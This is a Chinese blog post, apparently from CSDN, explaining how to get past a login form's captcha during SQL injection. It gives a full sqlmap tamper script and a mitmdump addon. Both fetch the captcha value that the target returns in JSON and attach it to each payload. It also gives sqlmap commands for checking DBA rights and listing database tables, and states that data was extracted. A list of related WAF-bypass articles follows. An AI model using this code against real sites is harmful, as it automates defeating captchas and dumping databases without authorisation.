tamper脚本编写与mitmdump

最新推荐文章于 2024-01-31 07:18:14 发布
最新推荐文章于 2024-01-31 07:18:14 发布
阅读量564 收藏
点赞数 1
分类专栏: Web打点 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44747030/article/details/131117653
版权

tamper脚本编写与mitmdump

0x01 前提

​ 注入点在登录框处,但是目标每次都会先校验验证码,而验证码会在返回包中以json格式出现。

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

0x02 编写tamper脚本

由于目标的验证码在response中回显出来了,所以我们可以利用tamper脚本去读取验证码,再利用sqlmap进行注入

tamper脚本所在kali路径中/usr/share/sqlmap/tamper

#!/usr/bin/env python

"""
Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

from lib.core.compat import xrange
from lib.core.enums import PRIORITY
import requests

__priority__ = PRIORITY.LOW

def dependencies():
    pass

def tamper(payload, **kwargs):
    #定义retVal变量,传递sqlmap payload
    retVal = payload
    #如果payload 存在
    if payload:
        #将 retVal 重置为空字符串
        retVal = ""
        url = "http://xxxx/captcha.php"
        headers = {
            "Cookie": "PHPSESSID=0jo0nef461ejnvb4ou2bojrl05"}
        #发送get请求
        res = requests.get(url, headers=headers, timeout=3)
        #获取json格式中的验证码
        #eg:"pharse":"ZsD88","base64":"\/9j\/4AAQSkZ"
        #res.text.split('":"') 以":"分割内容将一下分成了3个元素"pharse、ZsD88","base64、\/9j\/4AAQSkZ"
        #res.text.split('":"')=['"pharse', 'ZsD88","base64', '\/9j\/4AAQSkZ"']
        #res.text.split('":"')[1]=ZsD88","base64
        #split('"')=['ZsD88', ',', 'base64']
        #split('"')[0]=ZsD88
        yzm = res.text.split('":"')[1].split('"')[0]
        #将payload的值和&captcha+yzm截取到值返回,后续再通过burp改包
        retVal = "&captcha=" + yzm
        retVal = payload + retVal
    return retVal

原始包中

在这里插入图片描述

我们可以利用Burp中的Match and replace功能替换掉多余的数据(不使用正则也可以匹配到,一定要选对type)

方法2:sqlmap直接设置跳过url编码格式,只需要替换一下&captcha=变量

sqlmap -r sql.txt --is-dba --proxy=http://192.168.31.35:8081 --tamper=yanzhengma.py –skip-urlencode

在这里插入图片描述

在这里插入图片描述

点击auto-modified request 可以看到修改后的数据包

在这里插入图片描述

成功注出数据

在这里插入图片描述

0x03 利用mitmdump

​ 方法2:利用Mitmdump拦截请求数据并修改

mitmdump kali自带
<-mitmdump -s poc.py -p 8081->

from mitmproxy import ctx
import requests
#request(flow)函数是mitmproxy的回调函数,当收到请求,该函数就会被调用
def request(flow):
	#获取flow.request收到的请求对象
    request = flow.request
	#定义info 打印日志信息
    info = ctx.log.info
	#获取request中cookies的phpsessid值并赋值给Phps
    phps = request.cookies["PHPSESSID"]
	#获取request请求对象从开头到末尾第五位
	#username=xxx&password=xxx&captcha=tfaLj 也就是截取username=xxx&password=xxx&captcha=这一段
    tmp = request.text[0:-5]
	#调用获取验证码的函数,cap获取到的是return r["pharse"]也就是验证码的值
    cap = get_captcha(phps)
	#打印验证码
    info(f"captch {cap}")
	#打印请求结果
    request.text = f"{tmp}{cap}"
    info(str(request.text))
def get_captcha(phps):
    url = "http://192.168.31.100/captcha.php"
    r = requests.get(url,headers={"Cookie":f"PHPSESSID={phps}"}).json()
	#返回验证码的值
    return r["pharse"]

sqlmap发包即可

sqlmap -r sql.txt -D "db" --tables --proxy=http://192.168.31.106:8081 --threads=1 --tech=B --batch

在这里插入图片描述

evilxpl
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqlmap tamper脚本编写
m0_56578216的博客
09-22 500
SQLMap 是一款SQL注入神器,可以通过tamper 对注入payload 进行编码和变形,以达到绕过某些限制的目的。但是有些时候,SQLMap 自带的Tamper 脚本并不是特别好用,需要根据实际情况定制Tamper 脚本。sqlmap的编写语言也是python,tamper脚本能增强sqlmap的功能,达到绕过检测的目的。
一个tamper脚本
https://www.cnblogs.com/zpchcbd/
05-13 813
这个脚本的编写是有关于我博客里面的一篇过狗文章 大家可以参考下 https://blog.csdn.net/q1352483315/article/details/90175002 #!/usr/bin/env python # author:cbd666 """ Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) Se...
SQLMap的Tamper脚本
最新发布
m0_62207482的博客
01-31 3188
SQLMap是一款用来检测与利用SQL注入漏洞的免费 开源工具,不仅可以实现SQL注入漏洞的检测与利用的自动化处理,而且其自带 的Tamper脚本可以帮助我们绕过IDS/WAF的检测。虽然SQLMap提供了这么多的Tamper脚本,但是在实际使用的过程中,网站 的安全防护并没有那么简单,可能过滤了许多敏感的字符以及相关的函数。这个 时候就需要我们针对目标的防护体系手动构建相应的Tamper脚本。Tamper脚本的构建非常简单,其实渗透测试中真正的难点在于如何针对目标 网站的防护找出对应的绕过方法。
mysql常用的tamper脚本,tampermonkey 实用脚本
weixin_30913041的博客
03-18 557
@2018/11/29使用背景自从开始使用高分屏的 thinkpad,我总觉得那些经常光顾的网站字体太小,看起来既费劲又容易睡觉,因此就想着把它们调大一点。为了从系统层面解决这一问题,我加大了系统的整体字号:拒绝使用百分比缩放图标尺寸那样无论使用什么字体、怎么调整,都会模糊使用仅更改字体大小将下拉列表项的字体全部设置为 10 号(默认9号)。做了以上设置,打开资源管理器以及安装的软件,字体都要大一...
tamper脚本&mysql爆破脚本编写
路虽远,行将至。事虽难,做必达。
03-14 1005
tamper概念: sqlmap的--tamper参数可以引入用户自定义的脚本来修改注入时的payload,由此可以使用tamper来绕过waf,替换被过滤的关键字等。 基本操作: 查看脚本:python sqlmap.py --list-tampers 使用脚本:python sqlmap.py --tamper=script_name ...
1、Sqlmap Tamper脚本编写介绍-01
09-15
Sqlmap Tamper脚本编写介绍 Sqlmap Tamper脚本是对Sqlmap工具的扩展,主要功能是对原本的payload进行特定的更改以绕过WAF。Tamper脚本结构主要包括三个部分:Tamper脚本结构介绍、Tamper函数介绍和dependencies函数...
Tamper脚本管理器monkey
10-21
最受欢迎的用户脚本管理器,拥有超过1000万用户。 用于运行所谓的用户脚本(有时也称为Greasemonkey脚本)。用户脚本是很小的计算机程序,例如,可以在YouTube页面上添加下载按钮,清理Facebook时间轴或帮助玩在线...
sqlmap绕过过滤的 tamper 脚本分类汇总
03-17
sqlmap绕过过滤的 tamper 脚本分类汇总 sqlmap
sqlmap-tamper脚本分类
09-22
web渗透,sqlmap的脚本分类。渗透
Tampermonkey 油猴脚本.zip
02-26
Tampermonkey油猴脚本】是一个非常流行的浏览器扩展,尤其在开发者和高级用户中广泛使用。它允许用户自定义网页的行为,通过安装各种脚本来增强网页功能、优化浏览体验或者实现个性化设置。Tampermonkey支持多种...
sqlmap脚本
03-08
sqlmap绕过安全狗脚本 源自github sqlmap绕过安全狗脚本 来源自github
Tamper脚本分析 支持所有类型数据库的脚本
一米八多的瑞兹的博客
11-24 239
1. Tamper脚本常量文件 Tamper脚本常量文件 2. Tamper分析 分析支持所有类型数据库的脚本 分析apostrophemask.py 分析base64encode.py 分析multiplespaces.py
sqlmap --tamper 绕过WAF脚本分类整理
qq_50854662的博客
10-04 946
每当注入的时候看到这个贱贱的提示框,内心有千万只草泥马在奔腾。   但很多时候还是得静下来分析过滤系统到底过滤了哪些参数,该如何绕过。 sqlmap中的tamper给我们带来了很多防过滤的脚本,非常实用,可能有的朋友还不知道怎样才能最有效的利用tamper脚本。 当然使用脚本之前需要确定的就是系统过滤了哪些关键字,比如单引号、空格...
进阶的sqlmap用法(参数讲解)
热门推荐
0yst3r ‘s blog
09-21 1万+
进阶的sqlmap用法 参数讲解 1>探测等级: --level 5 --level 5 指的是需要执行的测试等级 一共有5个等级(1-5) 不加 level 时,默认是1 5级包含的payload最多,会自动破解出cookie、XFF等头部注入,相对应他的速度也比较慢。 level=2 http cookie会测试 level=3 http...
教你编写SQLMap的Tamper脚本过狗
蚁景网安学院
02-22 774
安全狗其实是比较好绕的WAF,绕过方法很多,但这里我们就用一种:注释混淆,一招鲜吃遍天下。注释混淆,其实就是在敏感位置添加垃圾字符注释。
Sqlmap过waf命令tamper各脚本的适用环境
Unknowncheats的博客
08-23 286
0x00 相信很多小伙伴和我一样感同身受,站上明明有注入可是被万恶的WAF拦截了或者过滤了,这时候就需要用到SQLMAP强大的tamper了. 0x01 使用方法--tamper xxx.py apostrophemask.py用UTF-8全角字符替换单引号字符 apostrophenullencode.py 用非法双字节unicode字符替换单引号字符 appendnullbyte.py在payload末尾添加空字符编码 base64encode.py 对给定的payload全部字符使用Base...
sqlmap的高级使用-tamper脚本使用、os-shell原理等
weixin_46626737的博客
07-11 715
(10)concat2concatws.py 用“CONCAT_WS(MID(CHAR(0), 0, 0), A, B)”替换像“CONCAT(A, B)”的实例。(5)between.py 分别用“NOT BETWEEN 0 AND #”替换大于号“>”,“BETWEEN # AND #”替换等于号“=(14)ifnull2ifisnull.py 用“IF(ISNULL(A), B, A)”替换像“IFNULL(A, B)”的实例。
Sqlmap Tamper 编写/改写 学习
Goodric的博客
04-26 1866
sqlmap的--tamper参数可以引入用户自定义的脚本修改注入时的payload ,达到sql注入时对一些敏感字符的一些绕过
从绕过安全狗到编写tamper脚本
god_Zeo的安全博客
04-21 1387
文章目录0x00 简述0x01 首先我们要判断哪个关键字被拦截了0x02 一些简单的知识点0x03 总结安全狗拦截的点0x04 Sqlmap tamper的编写0x05 tamper主要的三个部分0x06 tamper编写测试方法0x07 结束 0x00 简述 安全狗这些waf都是有一个特性,都是基于正则匹配去过滤的 但是实际情况是需要权衡可用性和安全性 当然厂商肯定是考虑到用户体验,所以不能出...
Sqlmap Tamper脚本详解:构造与绕过WAF策略
确保在编写脚本时,开发者明确指出了哪些环境因素是必要的,以便于其他用户正确地使用和评估其有效性。 在实际应用中,服务器代码提供了一个简单的例子,如PHP后端的一个查询语句,其中$id`参数可能通过注入进行...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值